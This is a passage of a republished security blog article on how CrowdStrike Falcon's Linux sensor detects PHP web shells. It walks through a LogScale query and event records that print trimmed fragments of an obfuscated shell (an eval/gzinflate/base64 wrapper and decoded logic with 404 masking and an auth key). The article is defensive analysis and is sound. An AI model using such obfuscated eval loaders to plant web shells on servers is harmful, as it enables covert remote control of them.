Advanced Web Shell Detection and Prevention: A Deep Dive into CrowdStrike’s Linux Sensor Capabilities

Bywiredgorilla February 7, 2026

We can further filter this down to investigate the disk operation shown in the detection by appending #event_simpleName to the pre-populated query:

aid=120da82da60d444d90dbc4f70df11660 (TargetProcessId=1761176184180866943 OR ContextProcessId=1761176184180866943) #event_simpleName=/ScriptControl|PhpExecuteScript|PhpBase64Decode|PhpEvalString|NewScriptWritten/

Figure 7. Falcon LogScale query filtering for web shell-related events

This query results in multiple correlated events that allow the analyst to investigate the detection:

#event_simpleName: NewScriptWritten

This event will show the full path and file name of the script written to disk, along with the process that wrote the script.

{
  "#event_simpleName": "NewScriptWritten",
  "ContextBaseFileName": "apache2",
  "FileName": "cache.php",
  "FilePath": "/var/www/html/uploads/"
}

Figure 8. Relevant fields from NewScriptWritten

#event_simpleName: ScriptControlDetectInfo

This event shows full contents of the script that triggered the detection along with the full process ancestry. We can see that the script content shown in this event does not decode the contents of the eval function.

{
  "#event_simpleName": "ScriptControlDetectInfo",
  "ScriptContent": "<?php [...trimmed for brevity...] eval(htmlspecialchars_decode(gzinflate(base64_decode($XtnR)))); ?>",
  "ImageFileName": "/usr/sbin/apache2"
}

Figure 9. ScriptContent from ScriptControlDetectInfo event

#event_simpleName: PhpExecuteScript

This event shows the PHP file that has been executed.

{
  "#event_simpleName": "PhpExecuteScript",
  "TargetFileName": "/var/www/html/uploads/cache.php"
}

Figure 10. TargetFileName shown in PhpExecuteScript event

#event_simpleName: PhpEvalString

This event shows the evaluated content from the eval function that was obfuscated within the original script content shown in Figure 8. This gives analysts immediate visibility into what the web shell does without manual deobfuscation.

{
  "#event_simpleName": "PhpEvalString", 
  "PhpEvalContent": "?><?phpnerror_reporting(0);nhttp_response_code(404);nfunction decrypt($encryptedData) { /* AES-256-CBC decryption */ }nif (decrypt('jFmSkTCWn5zcll7d3dHObg')){ echo "/7ZC2gHDStsE4z8Z0cifN3B+C/UO2vClZymoftbo/scHScvWfgNerZjP2hTO3Obd"; exit; }n$auth_key = "5a8c9a20daaef1947b0e9dee69622dc8";n/* User-agent filtering and authentication logic */n[...trimmed for brevity...]"
}

Figure 11. Decoded eval content in PhpEvalString event

Advanced Web Shell Detection and Prevention: A Deep Dive into CrowdStrike’s Linux Sensor Capabilities

Hackers have hit major super funds. A cyber expert explains how to stop it happening again

Top Cross-Platform Apps for Linux, Windows, and Mac in 2025

Superb fairy-wrens’ songs hold clues to their personalities, new study finds

How to Edit robots.txt in WordPress (With & Without Plugin)

SUPREME COURT SMACKS DOWN TRUMP; ICE NOW ARRESTING US CITIZENS; FDA STOPS FOOD INSPECTIONS!

Strategies to control costs and delight shoppers during peak shopping seasons

WordPress Tutorials

cPanel Plus

FAST DOMAINS

Similar Posts